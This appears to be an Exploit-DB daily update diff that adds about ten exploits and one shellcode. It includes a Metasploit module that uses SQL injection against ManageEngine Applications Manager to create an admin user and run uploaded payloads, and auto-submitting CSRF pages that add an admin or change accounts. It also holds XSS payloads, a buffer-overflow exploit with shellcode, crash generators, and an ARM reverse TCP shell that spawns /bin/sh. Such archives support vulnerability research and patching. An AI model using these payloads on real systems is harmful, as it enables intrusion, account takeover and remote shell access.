DB: 2019-04-23

10 changes to exploits/shellcodes

Ease Audio Converter 5.30 - '.mp4' Denial of Service (PoC)
QNAP myQNAPcloud Connect 1.3.4.0317 - 'Username/Password' Denial of Service
Google Chrome 73.0.3683.103 V8 JavaScript Engine - Out-of-Memory in Invalid Table Size Denial of Service (PoC)

LabF nfsAxe 3.7 Ping Client - 'Host IP' Buffer Overflow (Direct Ret)

ManageEngine Applications Manager 14.0 - Authentication Bypass / Remote Command Execution (Metasploit)
WordPress Plugin Contact Form Builder 1.0.67 - Cross-Site Request Forgery / Local File Inclusion
74CMS 5.0.1 - Cross-Site Request Forgery (Add New Admin User)
Msvod 10 - Cross-Site Request Forgery (Change User Information)
UliCMS 2019.2 / 2019.1 - Multiple Cross-Site Scripting

Linux/ARM - Password-Protected Reverse TCP Shellcode (100 bytes)

exploits/hardware/dos/46733.py

@@ -0,0 +1,29 @@
+#!/usr/bin/python
+# Exploit Title: QNAP myQNAPcloud Connect "Username/Password" DOS
+# Date: 19/04/2019
+# Exploit Author: Dino Covotsos - Telspace Systems
+# Vendor Homepage: https://www.qnap.com
+# Version: 1.3.4.0317 and below are vulnerable
+# Software Link: https://www.qnap.com/en/utilities/essentials
+# Contact: services[@]telspace.co.za
+# Twitter: @telspacesystems (Greets to the Telspace Crew)
+# Tested on: Windows XP/7/10 (version 1.3.3.0925)
+# CVE: CVE-2019-7181
+# POC
+# 1.) Generate qnap.txt
+# 2.) Copy the contents of qnap.txt to the clipboard
+# 3.) Paste the contents in any username/password field(Add or Edit VPN)
+# 4.) Click ok, program crashes.
+# This vulnerability was responsibly disclosed February 3, 2019, new version has been released.
+
+buffer = "A" * 1000
+
+payload = buffer
+try:
+    f=open("qnap.txt","w")
+    print "[+] Creating %s bytes QNAP payload.." %len(payload)
+    f.write(payload)
+    f.close()
+    print "[+] File created!"
+except:
+    print "File cannot be created"

exploits/multiple/dos/46735.html

@@ -0,0 +1,47 @@
+<!--
+# Exploit Title: Google Chrome 73.0.3683.103 V8 JavaScript Engine - Out-of-memory in invalid table size . Denial of Service (PoC)
+# Google Dork: N/A
+# Date: 2019-04-20
+# Exploit Author: Bogdan Kurinnoy (b.kurinnoy@gmail.com)
+# Vendor Homepage: https://www.google.com/
+# Version: Google Chrome 73.0.3683.103
+# Tested on: Windows x64
+# CVE : N/A
+
+# Description:
+
+# Fatal javascript OOM in invalid table size 
+
+# https://bugs.chromium.org/p/chromium/issues/detail?id=918301
+-->
+
+
+<html>
+<head>
+<script>
+
+var arr1 = [0,1];
+
+function ObjCreate(make) {
+  this.make = make;
+}
+
+var obj1 = new ObjCreate();
+
+function main() {
+
+	arr1.reduce(f3); 
+
+	Object.getOwnPropertyDescriptors(Array(99).join(obj1.make));
+
+}
+
+function f3() {
+
+	obj1["make"] = RegExp(Array(60000).join("CCC")); 
+}
+
+</script>
+</head>
+<body onload=main()></body>
+</html>

exploits/multiple/remote/46740.rb

@@ -0,0 +1,313 @@
+##
+# This module requires Metasploit: http://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+ 
+class MetasploitModule < Msf::Exploit::Remote
+  Rank = ExcellentRanking
+ 
+  include Msf::Exploit::Remote::HttpClient
+  include Msf::Exploit::FileDropper
+ 
+  def initialize(info={})
+    super(update_info(info,
+      'Name'           => "ManageEngine Applications Manager < 14.0 - Authentication Bypass / Remote Command Execution",
+      'Description'    => %q(
+        This module exploits sqli and command injection vulnerability in the ManageEngine AM 14 and prior versions.
+        It is completely different from the previous EDB-ID:46725 exploit.
+ 
+        Module creates a new admin user with SQLi (MSSQL/PostgreSQL) and provides authentication bypass.
+        Therefore an unauthenticated user can gain the authority of "system" on the server. 
+        It uploads malicious file using the "Execute Program Action(s)" feature of the app with the new admin account.
+ 
+        Tested: Applications Manager 14 on Linux 64-bit (PostgreSQL)
+                Applications Manager 14 on Windows 10 64-bit (MSSQL)
+                Applications Manager 14 on Windows 10 64-bit (PostgreSQL)
+                Applications Manager 13 on Windows Server 2012 R2 64-bit (MSSQL)
+                Applications Manager 12 on Windows Server 2012 R2 64-bit (PostgreSQL)
+      ),
+      'License'        => MSF_LICENSE,
+      'Author'         =>
+        [
+          'AkkuS <Özkan Mustafa Akkuş>', # Discovery & PoC & Metasploit module @ehakkus
+        ],
+      'References'     =>
+        [
+          [ 'URL', 'http://pentest.com.tr/exploits/ManageEngine-App-Manager-14-Auth-Bypass-Remote-Command-Execution.html' ]
+        ],
+      'DefaultOptions' =>
+        {
+          'WfsDelay' => 60, # countermeasure
+          'RPORT' => 8443,
+          'SSL' => true
+        },
+      'Privileged'     => true,
+      'Payload'        =>
+        {
+          'DisableNops' => true,
+        },
+      'Platform'       => ['unix', 'win', 'linux'],
+      'Targets' =>
+        [
+          [ 'Windows Target',
+            {
+              'Platform' => ['win'],
+              'Arch' => ARCH_CMD,
+            }
+          ],
+          [ 'Linux Target',
+            {
+              'Platform' => ['unix','linux'],
+              'Arch' => ARCH_CMD,
+              'Payload' =>
+                {
+                  'Compat' =>
+                    {
+                      'PayloadType' => 'cmd',
+                      'RequiredCmd' => 'generic perl ruby python',
+                    }
+                }
+            }
+          ]
+        ],
+      'DisclosureDate' => '22 April 2019',
+      'DefaultTarget'  => 1))
+ 
+    register_options(
+      [
+        OptString.new('TARGETURI', [true, 'The path of ME', '/'])
+      ],self.class)
+  end
+ 
+  def peer
+    "#{ssl ? 'https://' : 'http://' }#{rhost}:#{rport}"
+  end
+ 
+  def print_status(msg='')
+    super("#{peer} - #{msg}")
+  end
+ 
+  def print_error(msg='')
+    super("#{peer} - #{msg}")
+  end
+ 
+  def print_good(msg='')
+    super("#{peer} - #{msg}")
+  end
+ 
+  def exec(action)
+    # operation of malicious file. The end of the adventure :(
+    send_request_cgi(
+      'method'  => 'GET',
+      'uri'     =>  normalize_uri(target_uri.path, 'common', 'executeScript.do'),
+      'cookie'  => @cookie,
+      'vars_get' => {
+        'method' => 'testAction',
+        'actionID' => action,
+        'haid' => 'null'
+      }
+    )
+  end
+##
+# platform check
+##
+  def check_platform
+    # First touch to support of execute program ;)
+    res = send_request_cgi(
+      'method'  => 'GET',
+      'uri'     =>  normalize_uri(target_uri.path, 'showTile.do'),
+      'cookie'  => @cookie,
+      'vars_get' => {
+        'TileName' => '.ExecProg',
+        'haid' => 'null',
+      }
+    )
+    if res && res.code == 200 && res.body.include?('createExecProgAction')
+      # Platform can be discovered precisely using an application dir.
+      @dir = res.body.split('name="execProgExecDir" maxlength="200" size="40" value="')[1].split('" class=')[0] # It will be recalled later
+      if @dir =~ /:/
+        platform = Msf::Module::Platform::Windows
+      else 
+        platform = Msf::Module::Platform::Unix
+      end
+    else
+      fail_with(Failure::Unreachable, 'Connection error occurred! DIR could not be detected.')
+    end
+    file_up(platform, @dir)
+  end
+##
+# Creating and sending malicious files
+##
+  def file_up(platform, dir)
+    # specifying an extension by platform
+    if platform == Msf::Module::Platform::Windows
+      filex = ".bat"
+    else
+      if payload.encoded =~ /sh/
+        filex = ".sh"
+      elsif payload.encoded =~ /perl/
+        filex = ".pl"
+      elsif payload.encoded =~ /python/
+        filex = ".py"
+      elsif payload.encoded =~ /ruby/
+        filex = ".rb"
+      else
+        fail_with(Failure::Unknown, 'Payload type could not be checked!')
+      end
+    end
+ 
+    @fname= rand_text_alpha(9 + rand(3)) + filex
+    data = Rex::MIME::Message.new
+    data.add_part('./', nil, nil, 'form-data; name="uploadDir"')
+    data.add_part(payload.encoded, 'application/octet-stream', nil, "form-data; name=\"theFile\"; filename=\"#{@fname}\"")
+ 
+    res = send_request_cgi({
+      'method' => 'POST',    
+      'data'  => data.to_s,
+      'agent' => 'Mozilla',
+      'ctype' => "multipart/form-data; boundary=#{data.bound}",
+      'cookie' => @cookie,
+      'uri' => normalize_uri(target_uri, "Upload.do")     
+    })
+ 
+    if res && res.code == 200 && res.body.include?('icon_message_success') # Success icon control
+      print_good("#{@fname} malicious file has been uploaded.")
+      create_exec_prog(dir, @fname) # Great. Let's send them somewhere else o_O
+    else
+      fail_with(Failure::Unknown, 'The file could not be uploaded!')
+    end
+  end
+ 
+  def create_exec_prog(dir, fname)
+ 
+    @display = rand_text_alphanumeric(7)
+    res = send_request_cgi(
+      'method'  => 'POST',
+      'uri'     =>  normalize_uri(target_uri.path, 'adminAction.do'),
+      'cookie'  => @cookie,
+      'vars_post' => {
+        'actions' => '/showTile.do?TileName=.ExecProg&haid=null',
+        'method' => 'createExecProgAction',
+        'id' => 0,
+        'displayname' => @display,
+        'serversite' => 'local',
+        'choosehost' => -2,
+        'abortafter' => 5, # I think it would be enough for once. But I gave 5 O_o
+        'command' => fname,
+        'execProgExecDir' => dir,
+        'cancel' => 'false'
+      }
+    )
+ 
+    if res && res.code == 200 && res.body.include?('icon_message_success') # Success icon control
+      # Find actionID simply from body res
+      actionid = res.body.split('actionid=')[1].split("','710','350','250','200')")[0] 
+      print_status("Transactions completed. Attempting to get a session...")
+      exec(actionid)
+    else
+      fail_with(Failure::Unreachable, 'Connection error occurred!')
+    end
+ 
+  end
+##
+# Check all
+##
+  def check
+    # Instead of detecting the database type, we can guarantee the vuln by sending a separate query to both.
+    # The platform can be linux and possible remotely connected to the MSSQL database. 
+    # In the same way platform can be windows and postgresql can be used. 
+    # Thats why we are sending two queries. We will check the platform inside.
+    @uname = Rex::Text.rand_text_alpha_lower(6)
+    uid = rand_text_numeric(3)
+    apk = rand_text_numeric(6) 
+    @pwd = rand_text_alphanumeric(8+rand(9))
+    # MSSQL injection should be prepared with ASCII characters. 
+    # Map and join can be used for this.
+    @uidCHR = "#{uid.unpack('c*').map{|c| "CHAR(#{c})" }.join('+')}"
+    @unameCHR = "#{@uname.unpack('c*').map{|c| "CHAR(#{c})" }.join('+')}"
+    @apkCHR = "#{apk.unpack('c*').map{|c| "CHAR(#{c})" }.join('+')}"
+    @adm = "CHAR(65)+CHAR(68)+CHAR(77)+CHAR(73)+CHAR(78)" # "ADMIN" CHARs - should not be random
+    # PostgreSQL injection query // no need APIKEY
+    pg_user ="" 
+    pg_user << "1;insert+into+AM_UserPasswordTable+(userid,username,password)+values+"
+    pg_user << "($$#{uid}$$,$$#{@uname}$$,$$#{Rex::Text.md5(@pwd)}$$);"
+    pg_user << "insert+into+Am_UserGroupTable+(username,groupname)+values+($$#{@uname}$$,$$ADMIN$$);--+"
+    # MSSQL injection query
+    ms_user =""
+    ms_user << "1 INSERT INTO AM_UserPasswordTable(userid,username,password,apikey) values (#{@uidCHR},"
+    ms_user << " #{@unameCHR}, 0x#{Rex::Text.md5(@pwd)}, #{@apkCHR});"
+    ms_user << "INSERT INTO AM_UserGroupTable(username,groupname) values (#{@unameCHR}, #{@adm})--"
+    # Send SQL queries to both types of database(PostreSQL,MSSQL) with SQLi vuln..
+    use_sqli(ms_user, pg_user)
+ 
+    res = send_request_cgi(
+      'method'  => 'GET',
+      'uri'     =>  normalize_uri(target_uri.path, 'applications.do'),
+    )
+    # If the user we sent with queries was created, the login will be successful with new admin user.
+    if res && res.code == 200 && res.body.include?('.loginDiv') # css control makes more sense. The application language may not be English.
+      @cookie = res.get_cookies
+      res = send_request_cgi(
+        'method'  => 'POST',
+        'uri'     =>  normalize_uri(target_uri.path, 'j_security_check'),
+        'cookie'  => @cookie,
+        'vars_post' => {
+          'clienttype' => 'html',
+          'j_username' => @uname,
+          'j_password' => @pwd
+        }
+      )
+ 
+      if res && res.code == 302 && res.body.include?('Redirecting to')
+        res = send_request_cgi(
+          'method'  => 'GET',
+          'uri'     =>  normalize_uri(target_uri.path, 'applications.do'),
+          'cookie'  => @cookie
+          )
+        @cookie = res.get_cookies # last cookie
+        return Exploit::CheckCode::Vulnerable
+      else
+        return Exploit::CheckCode::Safe
+      end
+    else
+      return Exploit::CheckCode::Safe
+    end
+    
+  end
+ 
+  def exploit
+    unless Exploit::CheckCode::Vulnerable == check
+      fail_with(Failure::NotVulnerable, 'Target is not vulnerable.')
+    end
+    print_good("Excellent! Logged in as #{@uname}")
+    print_status("Admin Username => #{@uname}")
+    print_status("Admin Password => #{@pwd}")
+    check_platform # Start the adventure
+  end
+##
+# Communication with the database
+##
+  def use_sqli(mssql, postgresql)
+    # two different post data must be sent.
+    # Because the query structures are different.
+    send_request_cgi(
+      'method'  => 'POST',
+      'uri'     =>  normalize_uri(target_uri.path, 'jsp', 'FaultTemplateOptions.jsp'),
+      'vars_post' => {
+        'resourceid' => mssql
+      }
+    )
+    # important to send the +/$ characters clear
+    send_request_cgi(
+      {
+      'method' => 'POST',
+      'ctype'  => 'application/x-www-form-urlencoded',
+      'uri' => normalize_uri(target_uri.path, 'jsp', 'FaultTemplateOptions.jsp'),
+      'data' => "resourceid=#{postgresql}"
+      }, 25)
+ 
+  end
+end
+##
+# The end of the codes (o_O) // AkkuS
+##

exploits/php/webapps/46734.txt

@@ -0,0 +1,48 @@
+# Exploit Title: Contact Form Builder [CSRF → LFI]
+# Date: 2019-03-17
+# Exploit Author: Panagiotis Vagenas
+# Vendor Homepage: http://web-dorado.com/
+# Software Link: https://wordpress.org/plugins/contact-form-builder
+# Version: 1.0.67
+# Tested on: WordPress 5.1.1
+
+Description
+-----------
+
+Plugin implements the following AJAX actions:
+
+- `ContactFormMakerPreview`
+- `ContactFormmakerwdcaptcha`
+- `nopriv_ContactFormmakerwdcaptcha`
+- `CFMShortcode`
+
+All of them call the function `contact_form_maker_ajax`. This function
+dynamicaly loads a file defined in `$_GET['action']` or
+`$_POST['action']` if the former is not defined. Because of the way
+WordPress defines the AJAX action a user could define the plugin action
+in the `$_GET['action']` and AJAX action in `$_POST['action']`.
+Leveraging that and the fact that no sanitization is performed on the
+`$_GET['action']`, a malicious actor can perform a CSRF attack to load a
+file using directory traversal thus leading to Local File Inclusion
+vulnerability.
+
+PoC
+---
+
+```html
+<form method="post"
+action="http://wp-csrf-new.test/wp-admin/admin-ajax.php?action=/../../../../../../index">
+    <label>AJAX action:
+        <select name="action">
+                <option
+value="ContactFormMakerPreview">ContactFormMakerPreview</option>
+                <option
+value="ContactFormmakerwdcaptcha">ContactFormmakerwdcaptcha</option>
+                <option
+value="nopriv_ContactFormmakerwdcaptcha">nopriv_ContactFormmakerwdcaptcha</option>
+                <option value="CFMShortcode">CFMShortcode</option>
+        </select>
+    </label>
+    <button type="submit" value="Submit">Submit</button>
+</form>
+```

exploits/php/webapps/46738.html

@@ -0,0 +1,55 @@
+# Exploit Title: 74CMS v5.0.1 has a CSRF vulnerability to add a new admin user
+# Date: 2019-04-14
+# Exploit Author: ax8
+# Vendor Homepage: https://github.com/Li-Siyuan
+# Software Link: http://www.74cms.com/download/index.html
+# Version: v5.0.1
+# CVE : CVE-2019-11374
+
+ 
+
+74CMS v5.0.1 has a CSRF vulnerability to add a new admin user via the index.php?m=Admin&c=admin&a=add URI.
+
+ 
+
+<!--poc.html(creat a administrater)-->
+
+<!DOCTYPE html>
+
+<html>
+
+  <head>
+
+  <title> CSRF Proof</title>
+
+  <script type="text/javascript">
+
+    function exec1(){
+
+      document.getElementById('form1').submit();
+
+    }
+
+  </script>
+
+  </head>
+
+  <body onload="exec1();">
+
+    <form id="form1" action="http://localhost/index.php?m=Admin&c=admin&a=add" method="POST">
+
+      <input type="hidden" name="username" value="hacker1" />
+
+  <input type="hidden" name="email" value="111111111@qq.com" />
+
+      <input type="hidden" name="password" value="hacker1" />
+
+      <input type="hidden" name="repassword" value="hacker1" />  
+
+  <input type="hidden" name="role_id" value="1" />
+
+    </form>
+
+  </body>
+
+</html>

exploits/php/webapps/46739.html

@@ -0,0 +1,68 @@
+# Exploit Title: Msvod v10 has a CSRF vulnerability to change user information
+
+# Date: 2019-04-14
+# Exploit Author: ax8
+# Vendor Homepage: https://github.com/Li-Siyuan
+# Software Link: https://www.msvodx.com/
+# Version: v10
+# CVE : CVE-2019-11375
+
+ 
+
+Msvod v10 has a CSRF vulnerability to change user information via the admin/member/edit.html URI.
+
+ 
+
+<!--poc.html(change user infomation)-->
+
+<!DOCTYPE html>
+
+<html>
+
+  <head>
+
+  <title> CSRF Proof</title>
+
+  <script type="text/javascript">
+
+    function exec1(){
+
+      document.getElementById('form1').submit();
+
+    }
+
+  </script>
+
+  </head>
+
+  <body onload="exec1();">
+
+    <form id="form1" action="http://a.msvodx.cn/admin/member/edit.html" method="POST">
+
+      <input type="hidden" name="username" value="hacker1" />
+
+  <input type="hidden" name="nickname" value="hacker1" />
+
+  <input type="hidden" name="email" value="hacker1" />
+
+  <input type="hidden" name="tel" value="hacker1" />
+
+      <input type="hidden" name="password" value="hacker1" />
+
+      <input type="hidden" name="out_time" value="1970-01-01" />  
+
+  <input type="hidden" name="money" value="30" />
+
+  <input type="hidden" name="is_permanent" value="0" />
+
+  <input type="hidden" name="status" value="1" />
+
+  <input type="hidden" name="id" value="821" />
+
+    </form>
+
+  </body>
+
+</html>
+
+MISC:http://www.iwantacve.cn/index.php/archives/198/

exploits/php/webapps/46741.txt

@@ -0,0 +1,43 @@
+# Exploit Title: UliCMS - 2019.2 , 2019.1 - Multiple Cross-Site Scripting
+# Google Dork: intext:"by UliCMS"
+# Exploit Author: Kağan EĞLENCE
+# Vendor Homepage: https://en.ulicms.de/
+# Version: 2019.2 , 2019.1
+# CVE : CVE-2019-11398
+
+### Vulnerability 1
+
+Url : http://localhost/ulicms/ulicms/admin/index.php?go=test%27%20accesskey=%27X%27%20onclick=%27alert(1)
+Vulnerable File : /ulicms/admin/inc/loginform.php
+Request Type: GET
+Vulnerable Parameter : "go"
+Payload: test%27%20accesskey=%27X%27%20onclick=%27alert(1)
+
+Result : <input type="hidden" name="go" value='asd' accesskey='X'
+onclick='alert(1)'>
+
+### Vulnerability 2
+
+Url : http://localhost/ulicms/ulicms/admin/index.php?register=register&go=test%27%20accesskey=%27X%27%20onclick=%27alert(1)
+Vulnerable File : /ulicms/admin/inc/registerform.php
+Request Type: GET
+Vulnerable Parameter : "go"
+Payload : register=register&go=asd%27%20accesskey=%27X%27%20onclick=%27alert(1)
+
+Result : <input type="hidden" name="go" value='asd' accesskey='X'
+onclick='alert(1)'>
+
+### Vulnerability 3 - Authenticated
+
+Url : http://localhost/ulicms/ulicms/admin/index.php?action=favicon&error=%3Cscript%3Ealert(1)%3C/script%3E
+Request Type: GET
+Vulnerable Parameter : "error"
+Payload : action=favicon&error=%3Cscript%3Ealert(1)%3C/script%3E
+
+### History
+=============
+2019-04-13  Issue discovered
+2019-04-13  Vendor contacted
+2019-04-13  Vendor response and hotfix
+2019-04-14  Vendor releases fixed versions
+2019-04-22  Advisory release

exploits/windows/dos/46732.py

@@ -0,0 +1,28 @@
+# Exploit Title: Ease Audio Converter 5.30 Audio Cutter Dos Exploit
+# Date: 19.04.19
+# Vendor Homepage:http://www.audiotool.net/download.htm
+# Software Link:  http://www.audiotool.net/download/audioconverter.exe
+# Exploit Author: Achilles
+# Tested Version: 5.30
+# Tested on: Windows 7 x64 Sp1
+
+# 1.- Run the python script, it will create a new file with the name "Evil.mp4"
+# 2.- Open AudioConverter.exe and Click Function and choose Audio Cutter
+# 3.- Load the file "Evil.mp4"
+# 4.- Click ok
+# 5.- Click Gut
+# 5.- And you will see a crash.
+
+
+
+#!/usr/bin/env python
+buffer = "\x41" * 6000
+
+try:
+	f=open("Evil.mp4","w")
+	print "[+] Creating %s bytes evil payload.." %len(buffer)
+	f.write(buffer)
+	f.close()
+	print "[+] File created!"
+except:
+	print "File cannot be created"

exploits/windows/local/46737.py

@@ -0,0 +1,36 @@
+#!/usr/bin/python
+# Exploit Title: LabF nfsAxe 3.7 Ping Client - Buffer Overflow (Vanilla)
+# Date: 20-04-2019
+# Exploit Author: Dino Covotsos - Telspace Systems
+# Vendor Homepage: http://www.labf.com/nfsaxe
+# Version: 3.7
+# Software Link : http://www.labf.com/download/nfsaxe.exe
+# Contact: services[@]telspace.co.za
+# Twitter: @telspacesystems (Greets to the Telspace Crew)
+# Tested on: Windows XP SP3 ENG x86
+# CVE: TBC from Mitre
+# PoC:
+# 1.) Generate nfsaxeping.txt, copy the contents to clipboard.
+# 2.) In the application(ping.exe) paste contents of clipboard in to "Host IP" and click ok.
+# 3.) Click Start and calc pops
+#0x775a693b : jmp esp | asciiprint,ascii {PAGE_EXECUTE_READ} [ole32.dll] ASLR: False, Rebase: False, SafeSEH: True, OS: True, v5.1.2600.6435 (C:\WINDOWS\system32\ole32.dll)
+#Special thanks to John Leitch for the Windows XP SP3 EN Calc Shellcode (16 Bytes)
+
+shellcode = ("\x31\xC9"                     
+        "\x51"                            
+        "\x68\x63\x61\x6C\x63"            
+        "\x54"                            
+        "\xB8\xC7\x93\xC2\x77"            
+        "\xFF\xD0")                 
+		
+buffer = "A" * 29 + "\x3b\x69\x5a\x77" + "\x90" * 10 + shellcode + "C" * (220-29-4-10-16)
+
+payload = buffer
+try:
+    f=open("nfsaxeping.txt","w")
+    print "[+] Creating %s bytes ping payload.." %len(payload)
+    f.write(payload)
+    f.close()
+    print "[+] File created!"
+except:
+    print "File cannot be created"

files_exploits.csv

@@ -6392,6 +6392,9 @@ id,file,description,date,author,type,platform,port
 46722,exploits/multiple/dos/46722.txt,"Oracle Java Runtime Environment - Heap Corruption During TTF font Rendering in sc_FindExtrema4",2019-04-17,"Google Security Research",dos,multiple,
 46723,exploits/multiple/dos/46723.txt,"Oracle Java Runtime Environment - Heap Corruption During TTF font Rendering in GlyphIterator::setCurrGlyphID",2019-04-17,"Google Security Research",dos,multiple,
 46726,exploits/multiple/dos/46726.txt,"Netwide Assembler (NASM) 2.14rc15 - NULL Pointer Dereference (PoC)",2019-04-18,"Fakhri Zulkifli",dos,multiple,
+46732,exploits/windows/dos/46732.py,"Ease Audio Converter 5.30 - '.mp4' Denial of Service (PoC)",2019-04-22,Achilles,dos,windows,
+46733,exploits/hardware/dos/46733.py,"QNAP myQNAPcloud Connect 1.3.4.0317 - 'Username/Password' Denial of Service",2019-04-22,"Dino Covotsos",dos,hardware,
+46735,exploits/multiple/dos/46735.html,"Google Chrome 73.0.3683.103 V8 JavaScript Engine - Out-of-Memory in Invalid Table Size Denial of Service (PoC)",2019-04-22,"Bogdan Kurinnoy",dos,multiple,
 3,exploits/linux/local/3.c,"Linux Kernel 2.2.x/2.4.x (RedHat) - 'ptrace/kmod' Local Privilege Escalation",2003-03-30,"Wojciech Purczynski",local,linux,
 4,exploits/solaris/local/4.c,"Sun SUNWlldap Library Hostname - Local Buffer Overflow",2003-04-01,Andi,local,solaris,
 12,exploits/linux/local/12.c,"Linux Kernel < 2.4.20 - Module Loader Privilege Escalation",2003-04-14,KuRaK,local,linux,
@@ -10429,6 +10432,7 @@ id,file,description,date,author,type,platform,port
 46718,exploits/windows/local/46718.txt,"Microsoft Windows 10 1809 - LUAFV PostLuafvPostReadWrite SECTION_OBJECT_POINTERS Race Condition Privilege Escalation",2019-04-16,"Google Security Research",local,windows,
 46727,exploits/multiple/local/46727.rb,"LibreOffice < 6.0.7 / 6.1.3 - Macro Code Execution (Metasploit)",2019-04-18,Metasploit,local,multiple,
 46730,exploits/linux/local/46730.rb,"SystemTap 1.3 - MODPROBE_OPTIONS Privilege Escalation (Metasploit)",2019-04-19,Metasploit,local,linux,
+46737,exploits/windows/local/46737.py,"LabF nfsAxe 3.7 Ping Client - 'Host IP' Buffer Overflow (Direct Ret)",2019-04-22,"Dino Covotsos",local,windows,
 1,exploits/windows/remote/1.c,"Microsoft IIS - WebDAV 'ntdll.dll' Remote Overflow",2003-03-23,kralor,remote,windows,80
 2,exploits/windows/remote/2.c,"Microsoft IIS 5.0 - WebDAV Remote",2003-03-24,RoMaNSoFt,remote,windows,80
 5,exploits/windows/remote/5.c,"Microsoft Windows 2000/NT 4 - RPC Locator Service Remote Overflow",2003-04-03,"Marcin Wolak",remote,windows,139
@@ -17346,6 +17350,7 @@ id,file,description,date,author,type,platform,port
 46719,exploits/windows/remote/46719.py,"MailCarrier 2.51 - POP3 'RETR' SEH Buffer Overflow",2019-04-17,"Dino Covotsos",remote,windows,110
 46725,exploits/windows/remote/46725.rb,"ManageEngine Applications Manager 11.0 < 14.0 - SQL Injection / Remote Code Execution (Metasploit)",2019-04-18,AkkuS,remote,windows,
 46731,exploits/multiple/remote/46731.rb,"Atlassian Confluence Widget Connector Macro - Velocity Template Injection (Metasploit)",2019-04-19,Metasploit,remote,multiple,
+46740,exploits/multiple/remote/46740.rb,"ManageEngine Applications Manager 14.0 - Authentication Bypass / Remote Command Execution (Metasploit)",2019-04-22,AkkuS,remote,multiple,
 6,exploits/php/webapps/6.php,"WordPress 2.0.2 - 'cache' Remote Shell Injection",2006-05-25,rgod,webapps,php,
 44,exploits/php/webapps/44.pl,"phpBB 2.0.5 - SQL Injection Password Disclosure",2003-06-20,"Rick Patel",webapps,php,
 47,exploits/php/webapps/47.c,"phpBB 2.0.4 - PHP Remote File Inclusion",2003-06-30,Spoofed,webapps,php,
@@ -41166,3 +41171,7 @@ id,file,description,date,author,type,platform,port
 46710,exploits/php/webapps/46710.py,"Joomla Core 1.5.0 - 3.9.4 - Directory Traversal / Authenticated Arbitrary File Deletion",2019-04-16,"Haboob Team",webapps,php,80
 46728,exploits/windows/webapps/46728.txt,"Oracle Business Intelligence 11.1.1.9.0 / 12.2.1.3.0 / 12.2.1.4.0 - Directory Traversal",2019-04-19,"Vahagn Vardanyan",webapps,windows,
 46729,exploits/windows/webapps/46729.txt,"Oracle Business Intelligence / XML Publisher 11.1.1.9.0 / 12.2.1.3.0 / 12.2.1.4.0 - XML External Entity Injection",2019-04-19,"Vahagn Vardanyan",webapps,windows,
+46734,exploits/php/webapps/46734.txt,"WordPress Plugin Contact Form Builder 1.0.67 - Cross-Site Request Forgery / Local File Inclusion",2019-04-22,"Panagiotis Vagenas",webapps,php,80
+46738,exploits/php/webapps/46738.html,"74CMS 5.0.1 - Cross-Site Request Forgery (Add New Admin User)",2019-04-22,ax8,webapps,php,80
+46739,exploits/php/webapps/46739.html,"Msvod 10 - Cross-Site Request Forgery (Change User Information)",2019-04-22,ax8,webapps,php,80
+46741,exploits/php/webapps/46741.txt,"UliCMS 2019.2 / 2019.1 - Multiple Cross-Site Scripting",2019-04-22,"Kağan EĞLENCE",webapps,php,80

files_shellcodes.csv

@@ -957,3 +957,4 @@ id,file,description,date,author,type,platform
 46689,shellcodes/linux_x86/46689.c,"Linux/x86 - Add User (sshd/root) to Passwd File Shellcode (149 bytes)",2019-04-12,strider,shellcode,linux_x86
 46696,shellcodes/generator/46696.py,"Linux/x86 - MMX-PUNPCKLBW Encoder Shellcode (61 bytes)",2019-04-15,"Petr Javorik",shellcode,generator
 46704,shellcodes/linux_x86/46704.txt,"Linux/x86 - Cat File Encode to base64 and post via curl to Webserver Shellcode (125 bytes)",2019-04-15,strider,shellcode,linux_x86
+46736,shellcodes/arm/46736.txt,"Linux/ARM - Password-Protected Reverse TCP Shellcode (100 bytes)",2019-04-22,"Alan Vivona",shellcode,arm

shellcodes/arm/46736.txt

@@ -0,0 +1,100 @@
+/*
+* Title:    Linux/ARM - Password-Protected Reverse TCP Shell
+* Date:     2019-04-20
+* Tested:   armv6 (32-bit Raspberry Pi I)
+* Author:   Alan Vivona - @syscall59 - medium.syscall59.com
+* Size:     100 bytes
+* No null bytes / Null-free
+*/
+
+.section .text
+.global _start
+_start:
+
+.arm
+    add   r3, pc, #1 // switch to thumb mode 
+    bx    r3
+
+.thumb
+
+// [281] socket(2, 1, 0) 
+    mov   r0, #2
+    mov   r1, #1
+    eor   r2, r2
+    mov   r7, #200
+    add   r7, #81
+    svc   #1
+mov   r10, r0 // save sockfd into r10
+
+// [283] connect(socketfd, target, addrlen) 
+    // socket fd is in r0 already
+    adr   r1, target
+    strb  r2, [r1, #1] // replace the 0xff value of the protocol field with a 0x00
+    strb  r2, [r1, #5] // replace the 1st '255' values of the IP field with a 0
+    strb  r2, [r1, #6] // replace the 2nd '255' values of the IP field with a 0
+    mov   r2, #16
+    add   r7, #2  // 281 + 2 = 283
+    svc   #1
+
+// [003] read(sourcefd, destbuffer, amount)
+    push  {r1}
+    mov   r1, sp
+    mov   r2, #4
+    mov   r7, #3
+    read_pass:
+        mov   r0, r10
+        svc   #1
+    check_pass:
+        ldr   r3, pass
+        ldr   r4, [r1]
+        eor   r3, r3, r4
+    bne read_pass
+
+// [063] dup2(sockfd, stdIO) 
+    mov   r1, #2  // r1 = 2 (stderr)
+    mov   r7, #63 // r7 = 63 (dup2)
+    loop_stdio:
+        mov   r0, r10 // r0 = saved sockfd 
+        svc   #1
+        sub   r1,#1
+    bpl loop_stdio    // loop while r3 >= 0 
+
+// [011] execve(command, 0, 0) 
+    adr   r0, command
+    eor   r2, r2
+    eor   r1, r1
+    strb  r2, [r0, #7]
+    mov   r7, #11 
+    svc   #1
+
+// 2 bytes aligment fix if needed needed (can't use a nop as it has a null byte)
+// align_bytes : .byte 0xff, 0xff
+
+target:
+    // The 0xff will be replaced with a null on runtime
+    .ascii "\x02\xff"   // Protocol: IPv4/TCP. 
+    
+    .ascii "\x11\x5c"   // Port : 4444 
+    
+    // The '255' will be replaced with a 0 on runtime
+    .byte 127,255,255,1 // IP: 127.0.0.1. 
+    
+command: .ascii "/bin/sh?"  // The '?' will be replaced with a null on runtime
+
+pass: .ascii "S59!"
+
+
+/* 
+    Compile, link & extract: 
+    
+        as ARM-reverse-shell.s -o ARM-reverse-shell.o
+        ld -N ARM-reverse-shell.o -o ARM-reverse-shell
+        objcopy -O binary ARM-reverse-shell ARM-reverse-shell.dump
+        hexdump -v -e '"\\""x" 1/1 "%02x" ""' ARM-reverse-shell.dump
+
+        \x01\x30\x8f\xe2\x13\xff\x2f\xe1\x02\x20\x01\x21\x52\x40\xc8\x27\x51\x37\x01\xdf\x82\x46\x0e\xa1\x4a
